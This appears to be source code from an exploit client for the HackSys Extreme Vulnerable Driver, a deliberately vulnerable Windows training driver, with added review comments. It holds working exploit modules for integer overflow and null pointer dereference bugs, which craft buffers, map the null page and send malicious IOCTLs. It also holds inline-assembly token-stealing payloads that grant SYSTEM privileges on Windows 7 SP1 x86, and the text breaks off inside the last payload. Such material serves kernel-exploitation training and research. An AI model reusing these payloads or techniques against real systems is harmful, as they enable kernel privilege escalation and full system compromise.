17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | IntegerOverflow.c
43 |
44 | Abstract:
45 | This module implements the exploit for Integer Overflow
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "IntegerOverflow.h"
52 |
/*
 * Worker thread for the Integer Overflow module (see the abstract above).
 *
 * Parameter is unused. Returns EXIT_SUCCESS once the IOCTL has been issued; every
 * failure path calls exit(EXIT_FAILURE), which terminates the whole process rather
 * than just this thread, so the launcher never observes a failure return code.
 *
 * Names not defined in this file: DEVICE_NAME, BUFFER_SIZE, GetDeviceHandle,
 * HACKSYS_EVD_IOCTL_INTEGER_OVERFLOW and the DEBUG_* macros come in via Common.h;
 * TokenStealingPayloadWin7 is presumably declared in Payloads.h — confirm.
 *
 * NOTE(review): all pointer arithmetic goes through (ULONG) casts, which is only correct
 * for a 32-bit build (the build log links with /MACHINE:X86); on x64 the casts truncate.
 * NOTE(review): hFile is never closed (no CloseHandle), and HeapFree is skipped on the
 * exception path — both are reclaimed only because the process exits.
 */
DWORD WINAPI IntegerOverflowThread(LPVOID Parameter) {
    HANDLE hFile = NULL;
    ULONG BytesReturned;                 /* written by DeviceIoControl, never read */
    PVOID MemoryAddress = NULL;
    PULONG UserModeBuffer = NULL;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    PVOID EopPayload = &TokenStealingPayloadWin7;
    /* Byte size: BUFFER_SIZE ULONGs plus the extra slots defined in IntegerOverflow.h. */
    SIZE_T UserModeBufferSize = (BUFFER_SIZE + RET_OVERWRITE_INTEGER + BUFFER_TERMINATOR) * sizeof(ULONG);

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        /* Priority failure is logged but not fatal. */
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            /* HANDLE printed with %X — only the right width on x86. */
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Allocating Memory For Buffer\n");

        // Allocate the Heap chunk
        UserModeBuffer = (PULONG)HeapAlloc(GetProcessHeap(),
                                           HEAP_ZERO_MEMORY,
                                           UserModeBufferSize);

        if (!UserModeBuffer) {
            DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserModeBuffer);
            DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", UserModeBufferSize);
        }

        DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");

        /* Filler byte; nothing in this function reads it back. */
        RtlFillMemory((PVOID)UserModeBuffer, UserModeBufferSize, 0x41);

        /* Second-to-last ULONG of the buffer receives the payload address. */
        MemoryAddress = (PVOID)(((ULONG)UserModeBuffer + UserModeBufferSize) - (sizeof(ULONG) * 2));
        *(PULONG)MemoryAddress = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] RET Value: 0x%p\n", *(PULONG)MemoryAddress);
        DEBUG_INFO("\t\t\t[+] RET Address: 0x%p\n", MemoryAddress);

        /* Last ULONG (the BUFFER_TERMINATOR slot from the size formula) receives 0xBAD0B0B0;
         * what the driver does with that value is defined on the driver side, not visible here. */
        MemoryAddress = (PVOID)((ULONG)MemoryAddress + sizeof(ULONG));
        *(PULONG)MemoryAddress = (ULONG)0xBAD0B0B0;

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Integer Overflow\n");

        OutputDebugString("****************Kernel Mode****************\n");

        /* nInBufferSize is 0xFFFFFFFF although the buffer is only UserModeBufferSize bytes:
         * the mismatched length is this module's test input. NOTE(review): the BOOL result
         * is discarded, so a rejected or failed IOCTL goes unreported — log GetLastError()
         * when it returns FALSE. */
        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_INTEGER_OVERFLOW,
                        (LPVOID)UserModeBuffer,
                        (DWORD)0xFFFFFFFF,
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");

        HeapFree(GetProcessHeap(), 0, (LPVOID)UserModeBuffer);

        UserModeBuffer = NULL;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        /* GetLastError() is not the exception code; GetExceptionCode() would be — the
         * logged value may be stale. */
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
145 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | IntegerOverflow.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Integer Overflow Vulnerability implemented
47 | in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __INTEGER_OVERFLOW_H__
52 | #define __INTEGER_OVERFLOW_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
/* Extra ULONG slots that IntegerOverflowThread adds to BUFFER_SIZE (Common.h, not visible
 * here) when sizing its user buffer:
 *   RET_OVERWRITE_INTEGER - named for a return-address overwrite; why the count is 11 is not
 *                           derivable from this file — it depends on the driver build this
 *                           harness targets, confirm against the driver source.
 *   BUFFER_TERMINATOR     - one trailing slot; IntegerOverflowThread stores 0xBAD0B0B0 there. */
#define RET_OVERWRITE_INTEGER 11
#define BUFFER_TERMINATOR 1

/* Worker routine for the Integer Overflow module, handed to LaunchExploitThread
 * (HackSysEVDExploit.h). Parameter is unused; returns EXIT_SUCCESS, and on any error
 * calls exit(EXIT_FAILURE) — terminating the process — instead of returning. */
DWORD WINAPI IntegerOverflowThread(LPVOID Parameter);
62 |
63 | #endif //__INTEGER_OVERFLOW_H__
64 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/NullPointerDereference.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | NullPointerDereference.c
43 |
44 | Abstract:
45 | This module implements the exploit for Null Pointer
46 | Dereference Vulnerability implemented in HackSys Extreme
47 | Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "NullPointerDereference.h"
52 |
/*
 * Worker thread for the Null Pointer Dereference module (see the abstract above).
 *
 * Parameter is unused. Returns EXIT_SUCCESS once the IOCTL has been issued; every
 * failure path calls exit(EXIT_FAILURE), which terminates the whole process rather
 * than just this thread, so the launcher never observes a failure return code.
 *
 * Names not defined in this file: DEVICE_NAME, GetDeviceHandle, MapNullPage,
 * HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE and the DEBUG_* macros come in via Common.h;
 * TokenStealingPayloadWin7Generic is presumably declared in Payloads.h — confirm.
 *
 * NullPageBaseAddress stays NULL for the whole function, so NullPointerPlus4 is literally
 * address 0x4; the store to it is only possible because MapNullPage() mapped the zero page
 * first. Refusing to map the zero page to ordinary processes is the standard mitigation for
 * this bug class, and on such a platform this thread exits at the MapNullPage() check.
 *
 * NOTE(review): pointer arithmetic goes through (ULONG) casts — correct only for a 32-bit
 * build (the build log links with /MACHINE:X86). hFile is never closed (no CloseHandle).
 */
DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter) {
    HANDLE hFile = NULL;
    ULONG BytesReturned;                 /* written by DeviceIoControl, never read */
    ULONG MagicValue = 0xBAADF00D;
    PVOID NullPointerPlus4 = NULL;
    PVOID NullPageBaseAddress = NULL;    /* never assigned after this */
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    PVOID EopPayload = &TokenStealingPayloadWin7Generic;

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        /* Priority failure is logged but not fatal. */
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            /* HANDLE printed with %X — only the right width on x86. */
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Mapping Null Page\n");

        /* Fatal if the platform does not let this process map address 0. */
        if (!MapNullPage()) {
            DEBUG_ERROR("\t\t[-] Failed Mapping Null Page: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }

        DEBUG_INFO("\t\t[+] Preparing Null Page Memory Layout\n");

        /* NullPageBaseAddress is NULL, so this is address 0x4. */
        NullPointerPlus4 = (PVOID)((ULONG)NullPageBaseAddress + 0x4);

        // Now set the function pointer
        *(PULONG)NullPointerPlus4 = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] NullPage+0x4 Value: 0x%p\n", *(PULONG)NullPointerPlus4);
        DEBUG_INFO("\t\t\t[+] NullPage+0x4 Address: 0x%p\n", NullPointerPlus4);

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Null Pointer Dereference\n");

        OutputDebugString("****************Kernel Mode****************\n");

        /* &MagicValue is handed over with an input length of 0, although a 4-byte value
         * sits there. NOTE(review): the BOOL result is discarded, so a rejected or failed
         * IOCTL goes unreported — log GetLastError() when it returns FALSE. */
        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE,
                        (LPVOID)&MagicValue,
                        0,
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        /* GetLastError() is not the exception code; GetExceptionCode() would be — the
         * logged value may be stale. */
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
129 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/NullPointerDereference.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | NullPointerDereference.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Null Pointer Dereference Vulnerability
47 | implemented in HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __NULL_POINTER_DEREFERENCE_H__
52 | #define __NULL_POINTER_DEREFERENCE_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
58 | DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter);
59 |
60 | #endif //__NULL_POINTER_DEREFERENCE_H__
61 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/Payloads.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | Payloads.c
43 |
44 | Abstract:
45 | This module implements the EoP payload used for privilege
46 | escalation after gaining control of the instruction pointer
47 | in kernel.
48 |
49 | Test Bed:
50 | These payloads have been tested on Windows 7 SP1 x86
51 |
52 | TODO:
53 | 1. Add a better version of the EoP payload, basically DuplicateToken()
54 | stuff.
55 | 2. Try to have a universal payload and add a better way to do Kernel
56 | Recovery.
57 |
58 | --*/
59 |
60 | #include "Payloads.h"
61 |
62 | #pragma warning(push)
63 | #pragma warning(disable: 4731)
64 |
// Token-stealing payload with a hand-written kernel-recovery epilogue.
//
// Runs in kernel mode after a control-flow hijack in the HEVD driver on the
// Windows 7 SP1 x86 test bed (offsets come from Payloads.h). It copies the
// SYSTEM process's token value into the current process's _EPROCESS, then
// unwinds the hijacked frame by hand so the kernel keeps running instead of
// bug-checking.
//
// The stack-fixup constants ("add esp, 12" / "ret 8") are tied to the frame of
// the specific HEVD handler this payload is paired with on this build; they
// are wrong for any other frame, kernel build or architecture.
// (Warning C4731 is disabled around this function because the epilogue
// modifies EBP from inline assembly.)
VOID TokenStealingPayloadWin7() {
    // Importance of Kernel Recovery: without the epilogue below the kernel
    // would return into a corrupted frame and crash.
    __asm {
        pushad ; Save registers state

        ; Start of Token Stealing Stub
        xor eax, eax ; Set ZERO
        mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PrcbData.CurrentThread
        ; (in kernel mode FS selects the KPCR; the _KTHREAD pointer is at FS:[0x124])

        mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process (current _EPROCESS)

        mov ecx, eax ; Keep current process _EPROCESS in ECX for the final write

        mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4

        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
        sub eax, FLINK_OFFSET ; Flink points into the next _EPROCESS; rebase to its start
        cmp [eax + PID_OFFSET], edx ; nt!_EPROCESS.UniqueProcessId == SYSTEM_PID ?
        jne SearchSystemPID ; The list is circular: this never terminates if no PID 4 exists

        mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
        mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
        ; with SYSTEM process nt!_EPROCESS.Token
        ; NOTE(review): copies the raw Token field (an EX_FAST_REF, reference
        ; bits included) without referencing the token object; fine for a PoC,
        ; but the reference counts are left inconsistent.
        ; End of Token Stealing Stub

        popad ; Restore registers state

        ; Kernel Recovery Stub
        xor eax, eax ; Set NTSTATUS STATUS_SUCCESS as the return value
        add esp, 12 ; Fix the stack (frame-specific, see header comment)
        pop ebp ; Restore saved EBP
        ret 8 ; Return cleanly, popping two 4-byte arguments (stdcall)
    }
}
101 |
// Token-stealing payload for the /GS-protected stack-overflow case.
//
// Same token-stealing stub as TokenStealingPayloadWin7, but the recovery
// epilogue has to climb a much deeper stack: it re-reads two callee-saved
// values (labelled by the original author as the IRP pointer and the DbgPrint
// string) from fixed stack offsets before returning into an outer frame.
// Every offset in the recovery stub (0x798, 0x8, 0x234) was measured on the
// Windows 7 SP1 x86 test bed against one particular HEVD build; any other
// build will need them re-measured in a debugger.
//
// The function name carries a typo ("Paylad"); it is part of the public
// interface declared in Payloads.h and is kept as-is.
VOID TokenStealingPayladGSWin7() {
    // Importance of Kernel Recovery
    __asm {
        pushad ; Save registers state

        ; Start of Token Stealing Stub
        xor eax, eax ; Set ZERO
        mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PrcbData.CurrentThread
        ; (in kernel mode FS selects the KPCR; the _KTHREAD pointer is at FS:[0x124])

        mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process (current _EPROCESS)

        mov ecx, eax ; Keep current process _EPROCESS in ECX for the final write

        mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4

        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
        sub eax, FLINK_OFFSET ; Flink points into the next _EPROCESS; rebase to its start
        cmp [eax + PID_OFFSET], edx ; nt!_EPROCESS.UniqueProcessId == SYSTEM_PID ?
        jne SearchSystemPID ; The list is circular: this never terminates if no PID 4 exists

        mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
        mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
        ; with SYSTEM process nt!_EPROCESS.Token
        ; NOTE(review): copies the raw Token field (an EX_FAST_REF) without
        ; taking a reference on the token object.
        ; End of Token Stealing Stub

        popad ; Restore registers state

        ; Kernel Recovery Stub (all offsets are build-specific)
        add esp, 0x798 ; Offset of IRP on stack
        mov edi, [esp] ; Restore the pointer to IRP (callee-saved EDI expected by the outer frame)
        add esp, 0x8 ; Offset of DbgPrint string
        mov ebx, [esp] ; Restore the DbgPrint string (callee-saved EBX expected by the outer frame)
        add esp, 0x234 ; Skip to the target frame to return into
        xor eax, eax ; Set NTSTATUS STATUS_SUCCESS as the return value
        pop ebp ; Restore saved EBP
        ret 8 ; Return cleanly, popping two 4-byte arguments (stdcall)
    }
}
142 |
143 | #pragma warning(pop)
144 |
// Token-stealing payload without any kernel recovery.
//
// Only the token-stealing stub is executed; the compiler-generated epilogue
// then returns to whatever called this function. That is sufficient where the
// hijack was made through an ordinary call (for example an overwritten
// function pointer) and the caller's frame is intact, so there is nothing to
// repair. It is NOT sufficient after a stack overflow, where the return
// address and saved registers are already corrupted.
VOID TokenStealingPayloadWin7Generic() {
    // No Need of Kernel Recovery as we are not corrupting anything
    __asm {
        pushad ; Save registers state

        ; Start of Token Stealing Stub
        xor eax, eax ; Set ZERO
        mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PrcbData.CurrentThread
        ; (in kernel mode FS selects the KPCR; the _KTHREAD pointer is at FS:[0x124])

        mov eax, [eax + EPROCESS_OFFSET] ; Get nt!_KTHREAD.ApcState.Process (current _EPROCESS)

        mov ecx, eax ; Keep current process _EPROCESS in ECX for the final write

        mov edx, SYSTEM_PID ; WIN 7 SP1 SYSTEM process PID = 0x4

        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET] ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
        sub eax, FLINK_OFFSET ; Flink points into the next _EPROCESS; rebase to its start
        cmp [eax + PID_OFFSET], edx ; nt!_EPROCESS.UniqueProcessId == SYSTEM_PID ?
        jne SearchSystemPID ; The list is circular: this never terminates if no PID 4 exists

        mov edx, [eax + TOKEN_OFFSET] ; Get SYSTEM process nt!_EPROCESS.Token
        mov [ecx + TOKEN_OFFSET], edx ; Replace target process nt!_EPROCESS.Token
        ; with SYSTEM process nt!_EPROCESS.Token
        ; NOTE(review): copies the raw Token field (an EX_FAST_REF) without
        ; taking a reference on the token object.
        ; End of Token Stealing Stub

        popad ; Restore registers state; the C epilogue returns to the caller
    }
}
175 |
// Token-stealing payload used by PoolOverflowThread.
//
// PoolOverflow.c installs this function's address as the DeleteProcedure of a
// forged OBJECT_TYPE on the null page, so it is invoked by the kernel as a
// callback when the corrupted Event object is freed. Apart from the
// "mov eax, 0x1" before the compiler epilogue it is identical to
// TokenStealingPayloadWin7Generic. Why the callback returns 1 is not evident
// from this file; presumably the calling kernel routine inspects EAX —
// confirm against the target build before changing it.
VOID TokenStealingPayloadPoolOverflowWin7() {
    __asm {
        pushad ; Save registers state

        ; Start of Token Stealing Stub
        xor eax, eax ; Set ZERO
        mov eax, fs:[eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PrcbData.CurrentThread
        ; (in kernel mode FS selects the KPCR; the _KTHREAD pointer is at FS:[0x124])

